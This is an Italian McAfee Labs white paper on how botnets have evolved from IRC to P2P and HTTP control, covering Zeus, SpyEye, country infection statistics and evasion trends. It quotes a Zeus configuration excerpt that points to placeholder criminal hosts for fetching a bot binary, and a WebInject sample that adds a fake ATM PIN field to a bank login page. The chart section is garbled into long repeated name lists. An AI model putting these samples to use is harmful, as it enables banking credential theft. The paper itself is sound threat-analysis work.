White paper
La nuova era delle botnet
Di Zheng Bu, Pedro Bueno, Rahul Kashyap
e Adam Wosotowsky
McAfee Labs™
White paper
La nuova era delle botnet
Indice dei contenuti
Un settore in sviluppo
3
Evoluzione
4
Bot IRC 4
Bot localizzate
4
Bot P2P 4
Bot HTTP 5
Spy Eye
7
Diffusione globale
8
Suddivisione delle botnet: le principali minacce per nazione
9
Il ruolo dei governi 10
Chi è in pericolo?
11
Uno sguardo al futuro
11
Una nuova era di social zombie?
12
La massima clandestinità
13
Controffensiva: Global Threat Intelligence
14
Fonti
14
McAfee Labs™ 14
Informazioni su McAfee
14
White paper
La nuova era delle botnet
Le reti di robot, pubblicamente note come botnet, hanno una storia diversificata. In buona sostanza,
con bot si indica semplicemente una serie di script o comandi o un programma creato per collegarsi
a qualcosa (solitamente un server) ed eseguire un comando o una serie di comandi. Fondamentalmente
esegue varie funzioni. Non è necessariamente malevola o dannosa.
Le bot e i loro utilizzi si sono evoluti da semplici canali o osservatori di giochi (per esempio, le botnet
Wisner’s Bartender e Lindahl’s Game Manager) a fornitori di servizi specializzati come la gestione
dei database o la manutenzione di elenchi di accesso. Questo report prende in esame un utilizzo
molto diverso: il "raggruppamento" di bot (denominate anche droni o zombie) da parte dei criminali
informatici a supporto delle loro attività criminali.
Poiché interessano le aziende, queste attività criminali possono includere il furto di segreti commerciali,
l'inserimento di malware in file di codice sorgente, l'interruzione dell'accesso o di un servizio,
il danneggiamento dell'integrità dei dati e il furto delle informazioni relative all'identità dei dipendenti.
Le conseguenze per un'azienda possono essere disastrose e portare a perdita di fatturato e fiducia dei
clienti, danneggiamento della reputazione, non raggiungimento della conformità con le normative fino
alla chiusura dell'attività stessa. Per gli enti governativi, le preoccupazioni sono ancora più estese.
Analizzeremo l'evoluzione delle bot criminali, l'industria che ne supporta la creazione e la distribuzione
e come vengono oggi utilizzate da vari gruppi di criminali informatici. Suggeriremo inoltre quale
riteniamo sarà il loro futuro nel breve periodo.
Un settore in sviluppo
Il settore delle botnet ha registrato una sorta di "curva di crescita" (sebbene non in senso positivo).
Nei primi anni del secolo bot e botnet venivano create da programmatori con una buona conoscenza
di networking e protocolli come Internet Relay Chat (IRC). L'utilizzo del protocollo IRC diede avvio al
fenomeno del comando e controllo centralizzati, spesso noto anche come C&C. SDBot, una delle prime
e più note bot, era codificato in linguaggio C++. (SDBot era molto diffuso perché il suo autore aveva
pubblicato il codice sorgente, una pratica non comune.) Versioni più recenti di SDBot, note anche come
SpyBot, iniziarono a sfruttare vulnerabilità Microsoft di chiamate di procedura remota; perciò i suoi
programmatori avevano bisogno di competenze nella codifica di exploit per creare tali bot. In questo
periodo bot e botnet fiorivano sfruttando varie vulnerabilità ampiamente disponibili nelle più comuni
piattaforme Microsoft Windows. Le bot che emersero più tardi nel decennio passato presentavano
ulteriori funzionalità per lanciare attacchi denial-of-service (DoS), scansione delle porte e keylogging,
tra gli altri. Gli autori di questi malware richiedevano competenze nei linguaggi assemblatori nonché
una solida formazione in ambito networking. RBot (2003) è stato tra i primi a utilizzare schemi/packer
di compressione e cifratura come UPX, Morphine e ASPack. Tali richieste introdussero un nuovo livello
di programmatori informatici specializzati che comprendessero schemi di cifratura, crittografia e come
utilizzare tecniche evasive creando i loro codici binari.
A questo punto, non si poteva guardare indietro. Il successo di RBot spianò la strada per una più ampia
diffusione di crifratura e offuscamento in bot e botnet. Uno dei principali sviluppi nel controllo delle
botnet è stato l'utilizzo delle reti peer-to-peer (P2P) per le comunicazioni da parte di Sinit (2003) e Phatbot
(2004), che ha completamente modificato l'equazione delle comunicazioni delle botnet. Una delle
botnet più sofisticate basate su P2P emersa in seguito è stata Storm Worm/Nuwar (2007), che utilizzava
un'architettura P2P decentralizzata e si è dimostrata, per una volta, molto difficile da contrastare.
L'esigenza di sofisticazione nella tecnologia delle botnet è guidata dalle varie soluzioni di sicurezza
presenti sul mercato per combattere tali problemi. Inoltre, la sofisticazione stessa di bot e botnet
spinge l'evoluzione delle tecnologie di sicurezza, creando una relazione molto complessa tra misure
e contromisure tra gli autori di malware e i fornitori di soluzioni di sicurezza.
Chiaramente, bot e botnet sono diventate sempre più complesse. I programmatori di questo malware
devono possedere un livello avanzato di conoscenza di reti, sistemi e crittografia. Dati i volumi e il livello
di complessità elevati delle botnet, è molto probabile che siano creati non da un piccolo gruppo di persone
ma da un insieme di individui fortemente motivati dal ritorno economico delle loro imprese. La motivazione
è ovvia: sabotare e compromettere le aziende e rubare dati che hanno un valore monetario.
3
White paper
La nuova era delle botnet
Evoluzione
Bot IRC
Le prime bot non erano sempre dannose. Ma oggi è molto meno comune, specialmente negli ultimi
sei anni, a partire dall'esplosione delle botnet nel 2004 circa. Prima di allora, la maggior parte delle bot
utilizzava IRC come protocollo per il controllo.
Il protocollo IRC è stato utilizzato all'inizio per collegarsi alle chat room, che permettevano alle persone
di scambiarsi messaggi, ed erano molto comuni 10-15 anni fa. Tuttavia, con l'avvento dei protocolli di
messaggistica istantanea come ICQ, AIM e MSN Messenger, il protocollo IRC è diventato meno diffuso,
ma viene ancora utilizzato da molti professionisti di networking e sicurezza della "vecchia scuola".
Le prime bot venivano create per collegarsi a queste chat room (spesso denominate canali), assicurare che
il canale rimanesse aperto, riconoscere gli operatori del canale e dare loro il controllo del canale stesso.
L'impostazione più comune era quella di creare bot che potessero analizzare una rete e violare le
macchine che contenevano nuove o vecchie vulnerabilità. Una volta compromessa una macchina,
la bot si sarebbe collegata a una chat room (canale) specifica per ricevere istruzioni dal gestore della
bot, come avviare un attacco DoS contro un sito web. Ancora oggi osserviamo tale comportamento nel
recente attacco W32/Vulcanbot contro siti web di attivisti per i diritti umani. Altre funzioni IRC comuni
sono quelle di prendere videate del sistema, scaricare o far crescere una bot, e così via. Alcune bot
possono eseguire oltre 100 comandi.
Abbiamo registrato un gran numero di nuove bot nel 2004, a causa del rilascio di varie applicazioni
GUI che consentivano agli hacker di creare bot con un semplice clic. Tale facilità ha rappresentato un
enorme passo avanti per i criminali informatici e gli autori di malware: oggi coloro che non sapevano
come sviluppare programmi e avevano scarse conoscenze di protocolli di networking e sistemi operativi
potrebbero creare un'ampia gamma di bot con un semplice clic del mouse.
Bot localizzate
Le bot funzionano quasi esclusivamente sulle varie versioni di Windows, ma sono emerse anche versioni
localizzate. Utilizzando il linguaggio di script Perl, gli hacker hanno creato versioni che funzionano su
vari tipi di sistemi operativi Unix e Linux. L'autore di tali versioni è il gruppo di hacker brasiliani AtrixTeam, al tempo solo un gruppo di giovani "smanettoni". Dato il loro formato "aperto", ancora oggi
vediamo circolare queste versioni.
Bot P2P
Le botnet IRC della vecchia scuola sono ancora diffuse, ma hanno un punto debole: il server IRC.
Una volta chiuso il server, l'hacker perde il controllo dell'esercito di bot.
Nel 2007 è nato un nuovo tipo di botnet che utilizza il protocollo P2P. Si tratta dello stesso protocollo
che molti programmi utilizzano per scaricare musica, per esempio. Una di queste botnet utilizzava
un'implementazione cifrata basata sul protocollo eDonkey. Questo malware è diventato molto famoso:
veniva originariamente denominato W32/Nuwar ma è poi salito alla ribalta con il nome di worm Storm.
Storm incorporava circa 100 peer preimpostati come valori hash, che il malware decodifica e utilizza
per controllare i nuovi file da scaricare. Tutte le transazioni sono cifrate, così solo il malware stesso può
decodificare e agire in base alla risposta. Le risposte generalmente portano a URL che scaricano altro
codice binario.
Storm è stato responsabile della maggior parte dello spam durante gli anni 2007–2008 finché non
è stato bloccato.
Il vantaggio di un approccio P2P risiede nella sua struttura di controllo distribuita e flessibile, che
la rende più difficile da bloccare rispetto ad una botnet di tipo IRC. Tuttavia, questa tipologia è più
difficile da mantenere e diffondere data la sua complessità.
Alla fine di aprile, abbiamo osservato un altro malware che condivideva parte dello stesso codice responsabile di spam e attacchi DoS - di Storm.
4
White paper
La nuova era delle botnet
Bot HTTP
Due o tre anni fa, abbiamo assistito a un cambiamento nel controllo di molte botnet da canali IRC a siti
web, utilizzando il protocollo HTTP. Questo passaggio a un protocollo comune si è rivelato una mossa
intelligente da parte dei criminali informatici e degli autori di malware.
L'evoluzione del protocollo HTTP ha avuto inizio con i progressi nei "kit di exploit". Tali kit, sviluppati
principalmente da criminali informatici russi, includevano Mpack, ICEPack e Fiesta. Possono installare
software su macchine remote e quindi controllarle da un sito web remoto. I criminali informatici inviano
spam o un instant message con vari link alle vittime potenziali. Questi link conducono a siti web con
installato il kit di exploit. Il kit quindi stabilisce quale exploit utilizzare in base alla nazione, alla versione
del sistema operativo e del browser e anche alle versioni delle applicazioni client installate sulla macchina
della vittima. Tutto ciò avviene in modo dinamico e a insaputa della vittima. Se l'exploit ha successo, può
successivamente installare un insieme di malware per ottenere il controllo remoto della macchina infetta.
Di tutte le botnet HTTP attuali un caso molto particolare è rappresentato da Zeus (nota anche
come Zbot), specializzata nel furto di credenziali bancarie. Zeus include sia elementi client sia server.
Il server include un builder che aiuta il gestore della bot a creare una variante per il client del malware
PWS‑ZBot (il suo identificativo tecnico), che poi infetterà una macchina, portandola ad unirsi alla botnet
collegandosi a un sito web remoto che ospita il server Zeus.
Zeus segue un trend interessante: consentire a chiunque di creare in modo semplice una versione
personalizzata del malware. Il toolkit di Zeus è piuttosto costoso da acquistare, ma il suo autore ha
adottato una serie di misure per assicurarsi che lo strumento sia semplice da utilizzare, il che lo rende
anche semplice da vendere ad altre persone, incrementando così anche i profitti del suo creatore.
Il seguente esempio mostra Zeus Builder per la versione 1.2.x:
Il pannello di sinistra mostra solo due opzioni: Information e Builder. Selezionando Information si scopre
se la macchina è infettata con Zeus. Selezionando Builder, la persona che controlla il toolkit riceve
aiuto per creare una nuova bot. Il kit utilizza due file di input: Config e WebInjects. Sebbene il Builder
disponga di un tasto per modificare il file Config, il tasto è solo uno shortcut. Utilizziamo Notepad per
modificare il file. Il file Config include i parametri che saranno seguiti dalla bot.
5
White paper
La nuova era delle botnet
Esempi di Config:
…
url_config "http://www.[indirizzo-IP-dei-criminali].cn/cp/config.bin"
url_compip "http://www.[indirizzo-IP-dei-criminali].com/" 2048
encryption_key "12345654321"
;blacklist_languages 1049
end
entry "DynamicConfig"
url_loader "http://www.[altro-indirizzo-IP-di-criminale].cn/cp/bot.exe"
…
Questo estratto di Config indica alla bot dove dovrebbe andare per scaricare il file di configurazione e la
bot stessa. Questi passaggi assicurano che gli hacker che gestiscono le bot possano aggiornare le loro
bot e configurazioni con nuove funzioni e nuovi obiettivi in qualunque momento. Inoltre consentono
ai responsabili delle bot di distribuire il file di configurazione e il codice binario delle bot a server diversi,
creando così flessibilità con un'architettura distribuita.
Il secondo file per creare la bot è WebInject. Questo file specifica gli obiettivi, le vittime da cui l'autore di
malware o il proprietario del toolkit vuole ottenere informazioni. Zeus è in grado non solo di impossessarsi
di informazioni dalla pagina del web originale, ma anche di inserire campi aggiuntivi. In questo modo può
impossessarsi di un numero maggiore di informazioni se il proprietario del toolkit lo desidera.
Un esempio di WebInject:
…
set_url https://www.[grande-banca-vittima].com/* G
data_before
<span class="mozcloak"><input type="password"*/></span>
data_end
data_inject
<br><strong><label for="atmpin">ATM PIN</label>:</strong>&nbsp;<br />
<span class="mozcloak"><input type="password" accesskey="A" id="atmpin" name="USpass"
size="13" maxlength="14" style="width:147px" tabindex="2" /></span>
data_end
data_after
data_end
…
Questo codice sottrarrà le informazioni sull'URL, che in questo caso è una banca. Oltre a rubare nome
utente e password, Zeus inserirà un altro campo per il numero PIN del Bancomat.
6
White paper
La nuova era delle botnet
Come tendono a fare i malware che hanno successo, Zeus ha generato varie versioni "piratate"
del Builder. Alcuni includono addirittura i propri backdoor. Come è possibile? Una versione piratata
è apparsa nella seguente videata:
Questa versione, denominata MultiBuilder, ha creato due varianti sulla base di Zeus Version 1.3.
Abbiamo di recente assistito al passaggio di Zeus dalla Versione 1.3 alla 2.0, che oggi include un modello
di licenza molto rigoroso. Zeus è in realtà collegato alla macchina fisica dell'acquirente utilizzando una
licenza software commerciale! Il canale di creazione e distribuzione di questo malware mostra un forte
senso degli affari.
Spy Eye
Spy Eye è un altro esempio di bot HTTP complessa. Mostra varie similitudini con Zeus, principalmente
che si tratta di un form grabber e che vanta un'architettura di controllo davvero impressionante.
Come Zeus, Spy Eye dispone del proprio builder grafico:
7
White paper
La nuova era delle botnet
Una funzione interessante di Spy Eye è la sua capacità di rimuovere Zeus dalla macchina che infetta,
creando un conflitto interessante all'interno del mondo degli autori di malware. Non è la prima volta
che assistiamo ad una lotta tra autori di malware. Per evitare di essere analizzati dai loro obiettivi, sia
Zeus che Spy Eye offrono l'opzione di utilizzare una chiave di cifratura durante il processo di creazione
della bot. Nelle prime versioni di Zeus questa chiave era preimpostata e incorporata, il che offre alle
forze di sicurezza un modo molto più rapido per analizzare ed individuare gli obiettivi del malware.
Con questa nuova funzione, i malintenzionati hanno sicuramente innalzato il livello del gioco.
Diffusione globale
Distribuzione complessiva delle botnet per nazione
India
Brasile
Russia
Germania
Stati Uniti
Gran Bretagna
Colombia
Indonesia
Italia
Spagna
Argentina
Polonia
Pakistan
Portogallo
Vietnam
Corea del sud
Grecia
Cina
Bielorussia
Australia
Altri
Figura1: McAfee Labs ha rilevato più infezioni botnet - quasi 1,5 milioni - in India che in qualsiasi altra nazione.
Anche Brasile, Russia e Germania hanno superato il milione di infezioni rilevate.
8
White paper
La nuova era delle botnet
Suddivisione delle botnet : le principali minacce per nazione
Argentina
Cina
Gran Bretagna
Asprox
Australia
Asprox
Bielorussia
Asprox
Brasile
Asprox
Bagle-CB
Bagle-CB
Bagle-CB
Bagle-CB
Bobax
Bobax
Bobax
Bobax
Cimbot
Cimbot
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail
Cutwail
Cutwail2
Cutwail2
Cutwail2
Cutwail2
DarkMailer
DarkMailer
DarkMailer
DarkMailer
Dlena
Dlena
Dlena
Dlena
Donbot
Donbot
Donbot
Donbot
Festi
Festi
Festi
Festi
Gheg
Gheg
Gheg
Gheg
Grum
Grum
Grum
Grum
Grum2
Grum2
Grum2
Grum2
HelloGirl
HelloGirl
HelloGirl
HelloGirl
Lethic
Lethic
Lethic
Lethic
Maazben
Maazben
Maazben
Maazben
Mega-D
Mega-D
Mega-D
Mega-D
Netsky
Netsky
Netsky
Netsky
Altro
Altro
Altro
RK1
RK1
RK2
RK2
Reposin
Reposin
Rustock
Rustock
Storm
Storm
TwitGenPhish
TwitGenPhish
Xarvester
Xarvester
Asprox
Colombia
Asprox
Bagle-CB
Bagle-CB
Bobax
Bobax
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail2
Cutwail2
DarkMailer
DarkMailer
Dlena
Dlena
Donbot
Donbot
Festi
Festi
Gheg
Altro
RK1
RK1
RK2
RK2
Reposin
Reposin
Rustock
Rustock
Storm
Storm
TwitGenPhish
TwitGenPhish
Xarvester
Xarvester
Corea del sud
Asprox
Germania
Asprox
Bagle-CB
Bagle-CB
Bobax
Bobax
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail2
Cutwail2
DarkMailer
DarkMailer
Dlena
Dlena
Donbot
Donbot
Festi
Festi
Gheg
Gheg
Gheg
Grum
Grum
Grum
Grum
Grum2
Grum2
Grum2
Grum2
HelloGirl
HelloGirl
HelloGirl
HelloGirl
Lethic
Lethic
Lethic
Lethic
Maazben
Maazben
Maazben
Maazben
Mega-D
Mega-D
Mega-D
Mega-D
Netsky
Netsky
Netsky
Netsky
Altro
Altro
Altro
Altro
RK1
RK1
RK1
RK1
RK2
RK2
RK2
RK2
Reposin
Reposin
Reposin
Reposin
Rustock
Rustock
Rustock
Rustock
Storm
Storm
Storm
Storm
TwitGenPhish
TwitGenPhish
TwitGenPhish
TwitGenPhish
Xarvester
Xarvester
Xarvester
Xarvester
Asprox
Grecia
Asprox
India
Asprox
Indonesia
Asprox
Bagle-CB
Bagle-CB
Bagle-CB
Bagle-CB
Bobax
Bobax
Bobax
Bobax
Cimbot
Cimbot
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail
Cutwail
Cutwail2
Cutwail2
Cutwail2
Cutwail2
DarkMailer
DarkMailer
DarkMailer
DarkMailer
Dlena
Dlena
Dlena
Dlena
Donbot
Donbot
Donbot
Festi
Festi
Festi
Gheg
Gheg
Gheg
Grum
Grum
Grum
Grum2
Grum2
Grum2
HelloGirl
HelloGirl
HelloGirl
Lethic
Lethic
Lethic
Maazben
Maazben
Maazben
Mega-D
Mega-D
Mega-D
Netsky
Netsky
Netsky
Altro
Altro
Altro
RK1
RK1
RK1
RK2
RK2
RK2
Reposin
Reposin
Reposin
Rustock
Rustock
Rustock
Storm
Storm
Storm
TwitGenPhish
TwitGenPhish
TwitGenPhish
Xarvester
Xarvester
Xarvester
Donbot
Festi
Gheg
Grum
Grum2
HelloGirl
Lethic
Maazben
Mega-D
Netsky
Altro
RK1
RK2
Reposin
Rustock
Storm
TwitGenPhish
Xarvester
9
White paper
Italia
Asprox
Pakistan
Asprox
Polonia
Asprox
Portogallo
Asprox
Bagle-CB
Bagle-CB
Bagle-CB
Bagle-CB
Bobax
Bobax
Bobax
Bobax
Cimbot
Cimbot
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail
Cutwail
Cutwail2
Cutwail2
Cutwail2
Cutwail2
DarkMailer
DarkMailer
DarkMailer
DarkMailer
Dlena
Dlena
Dlena
Dlena
Donbot
Donbot
Donbot
Donbot
Festi
Festi
Festi
Festi
Gheg
Gheg
Gheg
Gheg
Grum
Grum
Grum
Grum
Grum2
Grum2
Grum2
Grum2
HelloGirl
HelloGirl
HelloGirl
HelloGirl
Lethic
Lethic
Lethic
Lethic
Maazben
Maazben
Maazben
Mega-D
Mega-D
Mega-D
Netsky
Netsky
Netsky
Altro
Altro
RK1
RK1
RK2
RK2
Reposin
Reposin
Rustock
Rustock
Storm
Storm
TwitGenPhish
TwitGenPhish
Xarvester
Xarvester
Altro
RK1
RK2
Reposin
Rustock
Storm
TwitGenPhish
Xarvester
Russia
La nuova era delle botnet
Asprox
Spagna
Asprox
Bagle-CB
Bagle-CB
Bobax
Bobax
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail2
Cutwail2
DarkMailer
DarkMailer
Dlena
Dlena
Donbot
Donbot
Festi
Festi
Gheg
Gheg
Grum
Grum
Grum2
Grum2
HelloGirl
HelloGirl
Lethic
Lethic
Maazben
Maazben
Mega-D
Mega-D
Netsky
Netsky
Altro
Altro
RK1
RK1
RK2
RK2
Reposin
Reposin
Rustock
Rustock
Storm
Storm
TwitGenPhish
TwitGenPhish
Xarvester
Xarvester
Stati Uniti
Asprox
Maazben
Mega-D
Netsky
Altro
RK1
RK2
Reposin
Rustock
Storm
TwitGenPhish
Xarvester
Vietnam
Asprox
Bagle-CB
Bagle-CB
Bobax
Bobax
Cimbot
Cimbot
Cutwail
Cutwail
Cutwail2
Cutwail2
DarkMailer
DarkMailer
Dlena
Dlena
Donbot
Donbot
Festi
Festi
Gheg
Gheg
Grum
Grum
Grum2
Grum2
HelloGirl
HelloGirl
Lethic
Lethic
Maazben
Maazben
Mega-D
Mega-D
Netsky
Netsky
Altro
Altro
RK1
RK1
RK2
RK2
Reposin
Reposin
Rustock
Rustock
Storm
Storm
TwitGenPhish
TwitGenPhish
Xarvester
Xarvester
Figura 2: Le principali botnet, per nazione. Rustock è di gran lunga la botnet più diffusa al mondo.
Il ruolo dei governi
Poiché la minaccia di una guerra informatica e dei danni che potrebbe causare aumenta, probabilmente
vedremo le botnet utilizzate come armi in conflitti futuri. Anzi, potrebbero essere già state utilizzate.
Nel nostro mondo sempre più tecnologico l'importanza di comunicazioni efficaci nella gestione di qualsiasi
crisi è fondamentale. L'organizzazione di risorse e il loro utilizzo per contrastare eventi naturali o artificiali
dipende in larga misura da Internet, uno strumento essenziale per divulgare informazioni ad una serie di
parti interessate e coordinare le loro risposte. Influire negativamente o interrompere tale flusso informativo
potrebbero addirittura peggiorare un evento. Internet potrebbe diventare un altro teatro di guerra.
Eventi come la recente marea nera nel Golfo del Messico, i bombardamenti in Europa e in Iraq, o le
schermaglie navali tra i coreani possono essere colpiti da interruzioni mirate di nuovi punti o gruppi di
risposta d'emergenza, che dipendono da Internet.
Le botnet possono essere acquistate o affittate al mercato nero, e i loro proprietari possono forzatamente
assumerne il controllo e reindirizzarle per nuovi obiettivi. Sappiamo che ciò accade regolarmente, perciò
sarebbe da sciocchi non aspettarsi che organizzazioni governative o stati nazione in tutto il mondo siano
coinvolti nell'acquisizione di funzionalità botnet per esigenze offensive e controffensive.
Un'entità civica o nazionale ha dei buoni motivi per acquisire una botnet dai suoi attuali proprietari.
Le botnet si infiltrano in aziende, singoli e uffici governativi oltre che in workstation militari. È una
questione della massima importanza che i diritti intellettuali e di privacy di cittadini e istituzioni in tutto
il mondo siano protetti da coloro che li utilizzerebbero illegalmente. Per assumere il controllo di una
botnet il nuovo responsabile sarà costretto a scegliere una strategia: chiudere il sistema, il che potrebbe
10
White paper
La nuova era delle botnet
potenzialmente danneggiare le macchine che sono parte della botnet, causare seri danni all'infrastruttura
ed eventualmente rendere il nuovo proprietario responsabile per il danno; disattivare la botnet finché
tutti i nodi infetti vengono modernizzati e non sono più sotto controllo; oppure monitorare la botnet
per identificare e catturare il gestore della bot. Ciascuno di questi passaggi è controverso.
Chi è in pericolo?
Tutti gli utenti di computer sono in pericolo perché tutti navighiamo sulla stessa rete Internet. Ci sono solo
una manciata di modi con cui i criminali informatici possono infettare un sistema o una rete con le loro bot
(o qualsiasi forma di software dannoso). Questi modi prevedono una qualche forma di social engineering,
che può essere definita come una violazione del cervello umano. Gli aggressori utilizzano uno strategemma
o un'esca per ingannare gli utenti di computer e spingerli o a fare clic su un link o a installare un programma
che non utilizzerebbero altrimenti. Una delle tecniche più intelligenti e diffuse oggi per i criminali informatici
è quella di utilizzare eventi di cronaca di alto profilo per attirare vittime inconsapevoli. I criminali informatici
leggono le stesse notizie di cronaca e sanno che molte persone consultano le notizie online. Che si tratti di
un link che finge di essere un video di un disastro attuale o un dramma che interessa celebrità famose, tali
stratagemmi attirano utenti come il miele con gli orsi. Tali aggressori potrebbero insegnare qualche trucco
ai responsabili marketing con la loro conoscenza del comportamento umano e che cosa gli utenti ricercano
online. Dobbiamo rimanere consapevoli dei rischi che corriamo navigando e utilizzando le tecnologie
Web 2.0 dal momento che i criminali informatici utilizzeranno le notizie per colpirci.
Ciascuno di noi dovrebbe essere sospettoso nei confronti degli attacchi di social networking, ma aziende e
governi subiscono i maggiori danni dagli attacchi di botnet. Alcune delle minacce per le aziende includono:
• Click
fraud: visitando pagine web e tramite clic automatico su banner pubblicitari per sottrarre grandi
somme di denaro da società pubblicitarie online
• Attacchi DoS distribuiti: saturazione della larghezza di banda per bloccare il traffico legittimo.
Questi attacchi sono più spesso condotti da aziende concorrenti, clienti insoddisfatti o per motivi politici.
• Infiltrazione in file system: accesso a sistemi critici per rubare dati dei clienti, informazioni sulla privacy
dei dipendenti, segreti commerciali, informazioni finanziarie aziendali, ecc.
• Disabilitazione della sicurezza esistente: prevenzione delle attività di bonifica o dirottamento da parte
di proprietari di bot rivali
• Spam: utilizzo di risorse e larghezza di banda di altri sistemi per inviare grandi quantità di spam
• Infezioni del codice sorgente: avvelenamento dell'intero albero del codice sorgente inserendo
modifiche non autorizzate e impercettibili o individuazione di ulteriori vulnerabilità da sfruttare
Le conseguenze di tali attacchi possono essere piuttosto gravi, con costi significativi per le aziende in
termini di manodopera e tempo per le attività di bonifica. Inoltre, le aziende potrebbero vedere annullati
i loro mandati di conformità con le normative o di settore. Sono inoltre probabili responsabilità legali da
parte di clienti, dipendenti o altri che abbiano subito danni per colpa di misure di sicurezza inadeguate
da parte dell'azienda.
Per i governi e i proprietari di infrastrutture critiche, i danni causati dalle botnet possono essere anche
più estesi:
• Gli
attacchi DoS possono interrompere le comunicazioni durante una crisi.
Le infezioni al codice sorgente possono provocare la chiusura di reti critiche.
• I sistemi ad accesso ristretto possono fornire al nemico informazioni militari.
•
Uno sguardo al futuro
Negli ultimi sei anni, le botnet sono diventate una delle maggiori minacce non solo per i professionisti
della sicurezza informatica ma anche per le aziende e i consumatori, praticamente chiunque possegga
un computer. Le botnet rappresentano l'infrastruttura più essenziale utilizzata da criminali informatici
e governi per lanciare praticamente ogni tipo di attacco: dallo spionaggio e fuoriuscita di dati allo spam
agli attacchi DDoS.
McAfee Labs ha già osservato un trend importante verso un'infrastruttura di botnet più distribuita
e flessibile, che si basa su tecnologie solide come il protocollo P2P, il controllo via web e i servizi
Web 2.0, oltre che su tecniche di evasione e fail-over.
11
White paper
La nuova era delle botnet
Una nuova era di social zombie?
Di pari passo con l'evoluzione dei servizi Web 2.0 aumentano anche le attività degli autori di botnet,
man mano che adottano nuove tecnologie per incrementare la complessità dei loro attacchi.
KeriosC2, mentre scriviamo questo report, è uno strumento proof-of-concept che dimostra che LinkedIn,
Twitter e TinyURL possono essere utilizzati per controllare una botnet. Gli utenti di computer in tutto
il mondo si divertono con il social networking; ora lo fanno anche le botnet. E non si tratta di uno
sviluppo positivo.
Dal momento che le botnet sfruttano applicazioni e protocolli utilizzati comunemente, sarà più difficile
che mai rilevare e prevenire le comunicazioni delle botnet.
Un ulteriore sviluppo si è verificato a maggio, quando alcune bot hanno iniziato ad utilizzare Twitter per
ricevere i comandi. La funzionalità è al momento piuttosto semplice; si limita a monitorare (o seguire)
un account Twitter per ricevere i comandi. Come si evince dalla videata seguente, ha un builder
GUI molto semplice.
A differenza dei più complessi Zeus o Spy Eye, questa forma non include alcuna opzione, semplicemente
un campo in cui inserire il nome utente di Twitter, che la bot seguirà per ricevere i comandi.
Mentre scriviamo, anche la struttura e la sintassi del comando sono elementari:
.VISIT: per aprire una pagina specifica
.DOWNLOAD: per scaricare un file da un'ubicazione remota
.DDOS: per causare un attacco denial of service alla vittima
12
White paper
La nuova era delle botnet
La massima clandestinità
Gli autori di botnet hanno adottato molti approcci per evitare il rilevamento da parte di software
o dispositivi di sicurezza. In termini di processo, gli autori di malware testano comunemente il loro
malware con i prodotti dei principali vendor di sicurezza per assicurarsi che non vengano individuati,
o quasi. Di conseguenza, criminali informatici e autori di malware spesso pubblicizzano il loro malware
come "a prova di rilevamento".
Elenchi di controllo degli accessi o l'applicazione di policy basate su IP possono rappresentare un
controllo efficace contro le connessioni da parte di una bot verso i suoi server di controllo. Autori di
botnet e malware hanno risposto a tale contrattacco implementando algoritmi di flusso invece che
utilizzare elenchi IP incorporati per i loro server di comando. Zeus utilizza questa tecnica per generare
domini rapidamente. Questo passaggio può sconfiggere in modo efficace i molti meccanismi di
rilevamento basati sulle tradizionali blacklist.
I malintenzionati hanno sviluppato molte tecniche di evasione per i download drive-by per evitare
l'ispezione da parte di dispositivi di sicurezza di rete. Un buon esempio è la manipolazione dell'estensione
dei file dimostrata dal builder Gh0st RAT. (Consultare la videata seguente.) Operazione Aurora e altre
nuove minacce malware hanno utilizzato trucchi simili. Osserviamo molti altri tipi di evasioni - dalla
semplice codifica alla cifratura (anche effettuando lo xoring del codice binario) - nel tentativo da parte
degli autori di malware di installare il loro software sulla macchina di una vittima.
Nel corso degli ultimi anni molte botnet di grandi dimensioni sono state messe offline. Per evitare che
ciò accada e rendere la loro infrastruttura di botnet più solida e flessibile, i responsabili delle bot hanno
iniziato ad introdurre nuove tecniche. Abbiamo già osservato le tecniche di flusso per incrementare
la flessibilità dei server di controllo. Il protocollo P2P, sebbene costoso da implementare e supportare,
è stato utilizzato anche in alcune botnet furtive come Storm e Nugache. I protocolli web, sia cifrati che
in chiaro, vengono ampiamente utilizzati in sostituzione dei comandi per il protocollo IRC utilizzato più
comunemente, principalmente perché queste porte web sono quasi universalmente abilitate attraverso
i firewall, anche in reti aziendali rigorosamente controllate.
McAfee Labs prevede che criminali informatici e autori di botnet continueranno a spingersi ai limiti delle
tecnologie Web 2.0. Di seguito alcuni altri avanzamenti previsti:
Funzionalità ed accesso multibrowser ben oltre Internet Explorer e Firefox
Maggiore integrazione incorporata con tecnologie di instant-messaging come JabberZeuS per fornire
un rapido accesso ai dati bancari e non solo
• Ulteriore integrazione con altro malware, come Bredolad e Pushdo, per assicurare una maggior
diffusione sui sistemi a livelo globale
•
•
13
White paper
La nuova era delle botnet
Controffensiva: Global Threat Intelligence
Poiché le minacce informatiche sono cresciute in modo esponenziale diventando anche sempre più
complesse, i professionisti della sicurezza richiedono un approccio diverso per rilevare e contrastare
gli attacchi. In passato, una strategia di difesa approfondita - una stratificazione di tecnologie simili era sufficiente. L'approccio odierno, tuttavia, deve sfruttare le informazioni correlate sulle minacce
provenienti da tutto il mondo e per tutti i vettori delle minacce. Tali informazioni di intelligence devono
essere poi incorporate in un'ampia gamma di prodotti di sicurezza per consentirgli di applicare policy
locali sulla base della più recente attività delle minacce e per condividere informazioni in modo che
l'infrastruttura di sicurezza complessiva operi in modo armonico.
McAfee sta scrivendo il capitolo successivo per quanto riguarda la sicurezza approfondita con Global
Threat Intelligence, il nostro motore nel cloud che raccoglie e correla i dati sulle minacce provenienti da
tutti i vettori delle minacce, crea un modello di minaccia completo e offre protezione al mercato tramite
una suite completa di prodotti di sicurezza. La nostra funzionalità cloud opera di concerto con i motori
locali dei prodotti McAfee e i meccanismi di enforcement basati sulle policy per fornire la protezione
contro le minacce più solida e completa disponibile sul mercato. I nostri clienti beneficiano dall'utilizzo
di prodotti di sicurezza McAfee che non solo condividono le informazioni di intelligence, ma lo fanno
in modo significativo e contestuale al loro ruolo e a dove risiedono sulla rete.
Fonti
• "Progress
Made, Trends Observed" (I progressi fatti, i trend rilevati), Microsoft Antimalware Team.
http://download.microsoft.com/download/5/6/d/56d20350-afc8-4051-a0df-677b28298912/msrt%20
-%20progress%20made%20lessons%20learned.pdf
• SecureWorks. http://www.secureworks.com/
